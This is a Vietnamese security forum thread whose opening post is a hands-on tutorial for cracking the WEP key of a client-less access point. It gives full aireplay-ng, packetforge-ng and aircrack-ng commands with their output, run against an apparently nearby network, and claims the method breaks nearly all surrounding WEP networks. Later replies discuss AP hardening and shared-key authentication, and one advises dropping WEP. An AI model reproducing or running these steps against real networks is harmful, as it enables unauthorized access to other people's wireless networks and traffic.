banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Cách dò khóa WEP khi không có client nào kết nối đến access point  XML
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 19/03/2010 21:48:35 (+0700) | #1 | 207381
[Avatar]
nhuhoang
Elite Member

[Minus]    0    [Plus]
Joined: 27/06/2007 00:49:10
Messages: 111
Location: /dev/null
Offline
[Profile] [PM] [WWW]
Giờ mà viết bài crack wep thì nghe có vẻ lỗi thời nhỉ, dùng công nghệ của năm 2010 để bẻ khóa công nghệ của những năm 2000. Nhưng thực tế thì có đến 30-40% số mạng không dây hiện tại vẫn dùng phương pháp mã hóa yếu ớt này. Do vậy đề tài dò khóa wep luôn là một đề tài được nhiều người quan tâm

Thông thường crack wep khá dễ, nhưng đó là đối với các mạng đang có client kết nối. Khi client dùng mạng thì thi thoảng sẽ tạo ra những gói ARP request và ta sẽ bắt gói tin này, bơm liên tục vào access point khiến cho access point phải “nhả” key ra cho ta dùng. Tuy nhiên đối với mạng không có client thì sao, sẽ không có ARP request để mà bơm, do vậy ta phải tự “tạo” ra một gói ARP làm sao cho access point tưởng đó là thật mà nhả key ra
Bài này sử dụng file iso Backtrack 4.0 final và usb wifi TP-Link WN321G, cả 2 đều được mount vào máy ảo VMware để có thể vừa dò vừa viết log
Sau khi quét phát hiện thấy mạng ACTIONTEC sóng khá tốt nhưng ko hề có data, tức ko có client nào kết nối
Code:
[CH  7 ][ Elapsed: 3 mins ][ 2010-01-22 22:41

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1E:E5:98:41:BE  -73      111      223    0  11  54 . WEP  WEP    OPN  delta
 00:0F:B3:3A:76:35  -76       36        0    0   9  54 . WEP  WEP         ACTIONTEC
 00:B0:0C:3E:12:3B  -82       72        0    0   6  54   OPN              TENDA
 00:B0:0C:05:1A:0A  -83       11        0    0   6  54   WPA2 CCMP   PSK  PhanBro

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1E:E5:98:41:BE  00:1D:0F:DF:E3:00    0    0 - 1      0      114
 00:1E:E5:98:41:BE  00:12:F0:CA:2B:BE   -1    1 - 0      0      359
 (not associated)   00:1F:E1:9C:98:17  -79    0 - 1      0       19  ZyXEL
 (not associated)   00:21:00:B7:DE:02  -81    0 - 1      0       19  vietdat
 (not associated)   00:16:EA:C6:16:62  -37    0 - 1      0       17

Đầu tiên, sniff mạng ACTIONTEC vào file
Code:
airodump-ng wlan0 -c 9 --bssid 00:0F:B3:3A:76:35 -w actiontec

CH  9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:0F:B3:3A:76:35  -81   0     4015        0    0   9  54 . WEP  WEP    OPN  ACTIONTEC

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Giả mạo làm một người dùng hợp pháp bằng tính năng fake authentication của aireplay-ng
Code:
aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0 

root@bt:~# aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
22:43:11  Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9

22:43:11  Sending Authentication Request (Open System) [ACK]
22:43:11  Authentication successful
22:43:11  Sending Association Request [ACK]
22:43:11  Association successful :-) (AID: 1)
22:43:21  Sending Authentication Request (Open System)
Rình rập một chú “cừu non” đi lạc. Nguyên lý của cách tấn công này là tóm lấy 1 packet phù hợp từ accesspoint, sử dụng các thông số có trong packet này để tạo ra arp request. Tùy vào sự may mắn, bạn có thể phải chờ chương trình read vài ngàn gói tin mới có thể tìm được một gói tin ưng ý, gói tin này có chứa keystream.
Code:
root@bt:~# aireplay-ng -5 -b 00:0F:B3:3A:76:35 wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
22:44:26  Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9
22:44:26  Waiting for a data packet...
Read 2233 packets...

        size: 386, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:0F:B3:3A:76:35
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:0F:B3:3A:76:32

        0x0000:  0842 0000 0100 5e7f fffa 000f b33a 7635  
        0x0010:  000f b33a 7632 403f aa16 ea00 41a3 9c9c  
        0x0020:  fc66 2e21 4713 6d55 be7b b622 a5c8 47f1
        0x0030:  be1f 4cd4 c488 5d6c a4de 07e4 d815 88f4  
        0x0040:  75ae cce8 2092 854a 8101 73d4 77f4 2e80
        0x0050:  1321 0747 5aaa 8025 04a2 c65e a237 794e 
        0x0060:  556c f897 2f02 dab6 6a13 5967 c6a2 548e 
        0x0070:  ca0d bb21 326f 2abe 8afa aae5 9212 2ca9 
        0x0080:  1046 0084 0319 2b46 e651 6497 0c72 d1b1
        0x0090:  2335 ffc8 111c 152e 2b49 e222 a204 06ea 
        0x00a0:  5594 19b3 cebf 0eaf b295 d9de 6768 595a 
        0x00b0:  0eb5 f86f 4349 5d75 b650 34a2 61ed 2c42 
        0x00c0:  ce30 f519 bc72 57af 8367 bce6 d87f 3fd6 
        0x00d0:  7c42 fd6a 8dff 9384 a5df dfa0 292e 194a 
        --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0122-224956.cap
22:50:00  Data packet found!
22:50:00  Sending fragmented packet
22:50:00  Got RELAYED packet!!
22:50:00  Trying to get 384 bytes of a keystream
22:50:00  Not enough acks, repeating...
22:50:00  Trying to get 384 bytes of a keystream
22:50:00  Got RELAYED packet!!
22:50:00  Trying to get 1500 bytes of a keystream
22:50:00  Got RELAYED packet!!
Saving keystream in fragment-0122-225000.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Dùng packetforce-ng để chế biến ra một arp request hoàn toàn hợp lệ, giống như chú blackberry của mấy anh Hồ Cẩm Đào vậy
Code:
root@bt:~# packetforge-ng -0 -a 00:0F:B3:3A:76:35 -h 00:1D:0F:DF:E3:00 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0122-225000.xor -w arp-req

Wrote packet to: arp-req

Có đạn rồi thì cứ lắp vào súng máy mà bắn thôi
Code:
root@bt:~# aireplay-ng -2 -r arp-req wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)

        size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:0F:B3:3A:76:35
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1D:0F:DF:E3:00

        0x0000:  0841 0201 000f b33a 7635 001d 0fdf e300 
        0x0010:  ffff ffff ffff 8001 06cc 8500 fdf0 b56b  
        0x0020:  aa0c d118 7897 55e7 c4c6 8806 6fca 10d9 
        0x0030:  2976 ea99 b1eb 35d6 097b 4702 72ec 4829 
        0x0040:  c854 6e25                               

Use this packet ? y

Saving chosen packet in replay_src-0122-230028.cap
You should also start airodump-ng to capture replies.

Send 4580 packets…(499pps)

Quay lại airodump-ng xem lượng data tăng vùn vụt
Code:
[ CH  9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:0F:B3:3A:76:35  -81   0     4015    25972  442   9  54 . WEP  WEP    OPN  ACTIONTEC

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:0F:B3:3A:76:35  00:1D:0F:DF:E3:00    0    0 - 1      1    59304

Với tốc độ 500pps thì chỉ cần 30s để phá wep 64 bit, còn wep 128 bit thì lâu hơn 20 lần, khoảng 10 phút
Code:
root@bt:~# aircrack-ng -a 1 actiontec-01.cap
Opening actiontec-01.cap
Read 53122 packets.

   #  BSSID              ESSID                     Encryption

   1  00:0F:B3:3A:76:35  ACTIONTEC                 WEP (12538 IVs)

Choosing first network as target.

Opening actiontec-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 12633 ivs.

                                          Aircrack-ng 1.0 rc3 r1552

                          [00:01:33] Tested 775 keys (got 41314 IVs)

   KB    depth   byte(vote)
    0    1/  2   5E(52736) 95(49152) 49(48896) 46(48640) 65(48384) 67(48384) 99(48128)
    1   16/  1   B6(46336) C3(45824) 73(45568) C5(45568) DF(45568) 04(45056) 2A(45056)
    2    0/  3   33(57856) C2(50944) 4B(49920) 7E(49408) 0C(48896) 76(48128) 4F(47616)
    3    0/  6   44(56064) F3(51712) 24(49920) 31(48640) 57(48640) 2F(48384) 19(48128)
    4   41/  4   B6(44800) 03(44544) 4A(44544) 6A(44544) 91(44544) A3(44544) CD(44544)

             KEY FOUND! [ 11:11:11:11:11:11:11:11:11:11:11:11:11 ]
        Decrypted correctly: 100%


Ngoài ra còn một số cách nữa nhưng với bài viết này bạn có thể dò được đến 99% mạng wireless dùng WEP xung quanh, trừ những mạng xác thực bằng RADIUS (mà thực tế rất ít).
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 24/03/2010 10:08:35 (+0700) | #2 | 207658
[Avatar]
nhanth87
Member

[Minus]    0    [Plus]
Joined: 12/08/2009 08:54:00
Messages: 168
Offline
[Profile] [PM]
Các AP đời sau này filmware của tụi nó đều được Harderning để chống fake authentication hoặc inject gói tin hết rồi nên cách naỳ nhiều khi không dùng được.
Aricent - Software Engineer
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 24/03/2010 19:51:04 (+0700) | #3 | 207683
[Avatar]
nhuhoang
Elite Member

[Minus]    0    [Plus]
Joined: 27/06/2007 00:49:10
Messages: 111
Location: /dev/null
Offline
[Profile] [PM] [WWW]

nhanth87 wrote:
Các AP đời sau này filmware của tụi nó đều được Harderning để chống fake authentication hoặc inject gói tin hết rồi nên cách naỳ nhiều khi không dùng được. 


Chống injection bằng cách giới hạn packet/s thì còn được chứ fake authen thì chịu thôi bạn à. Có một trường hợp mà nhiều bạn nhầm lẫn là router được filter MAC thì các bạn không thể fake authen được mà vẫn phải dò cho đến khi có client kết nối vào rồi dùng macchanger, chứ không phải router có tính năng chống fake authen (chống thì loại luôn cả ng dùng hợp pháp rồi còn gì)
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 25/03/2010 16:41:52 (+0700) | #4 | 207741
[Avatar]
nhanth87
Member

[Minus]    0    [Plus]
Joined: 12/08/2009 08:54:00
Messages: 168
Offline
[Profile] [PM]
Mình chỉ nói cách này không dùng được chứ có bảo là không fake authentication được đâu smilie ?

WEP có 2 kiểu mã hóa. Đó là Open system và shared key.
Fake authentication chỉ dùng ngay được với open system vì nó cho phép client asociation với AP.
Còn đối với shared key (là kiểu key hex có dạng AA:BB:CCsmilieD:EE:FF:11:22) thì client và Ap còn phải qua một bước gọi là challenge, do đó không thể fake authentication như bài của bạn nhuhoang được. Lúc đó, bắt buộc phải có 1 client đang kết nối (giống như ngồi rình bắt 4 ways handshark í ^^) với Ap và chúng ta dùng airodump-ng -9 để capture PRGA file. Dùng PRGA file này ta mới fake authentication được (aireplay-ng -y prga.xor).

Tóm lại dù được harderning rất cẩn thận nhưng WEp vẫn tồn tại những yếu điểm cố hữu, do đó không nên dùng WEP nữa.
Aricent - Software Engineer
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 29/03/2010 18:21:44 (+0700) | #5 | 208025
nat112
Member

[Minus]    0    [Plus]
Joined: 17/09/2008 20:43:29
Messages: 5
Offline
[Profile] [PM]
Cái này có thể demo dùng mạng ad-hoc được không bạn dùng 1 máy phát không có client nào join vào.
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 04/04/2010 21:57:18 (+0700) | #6 | 208427
B 0 0 B
Member

[Minus]    0    [Plus]
Joined: 31/07/2009 17:19:41
Messages: 149
Offline
[Profile] [PM]
chủ đề hơi cũ nhưng nội dung bài viết hay và dễ hiểu lắm, sẽ giúp các bạn sau dễ tìm hiểu hơn nữa

bạn có thể post 1 bài tiếp theo về crack WPA-TKIP không
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 06/04/2010 14:49:47 (+0700) | #7 | 208501
lamer
Elite Member

[Minus]    0    [Plus]
Joined: 26/02/2008 13:28:49
Messages: 215
Offline
[Profile] [PM]

nhuhoang wrote:
ko có client nào kết nối 


nhuhoang wrote:
Rình rập một chú “cừu non” đi lạc 


Sao khó hiểu quá vậy?
[Up] [Print Copy]
  [Article]   Cách dò khóa WEP khi không có client nào kết nối đến access point 07/04/2010 09:22:09 (+0700) | #8 | 208547
[Avatar]
nhanth87
Member

[Minus]    0    [Plus]
Joined: 12/08/2009 08:54:00
Messages: 168
Offline
[Profile] [PM]

lamer wrote:

nhuhoang wrote:
ko có client nào kết nối 


nhuhoang wrote:
Rình rập một chú “cừu non” đi lạc 


Sao khó hiểu quá vậy? 
.

Em nghĩ đây là kỹ thuật crack WEP trong trường hợp không có máy nào nối vào AP.
Còn "Rình rập một chú “cừu non” đi lạc" tức là bắt một gói tin (mà thưc ra là gói ARP - doán được dựa vào size - rồi chế biến (thêm IP dest, IP source mà ta đã biết trước, nhân bản nó lên, gửi trả AP, sau đó đón các ARP trả lại và bắt đầu bruceforce, tìm key)
Aricent - Software Engineer
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|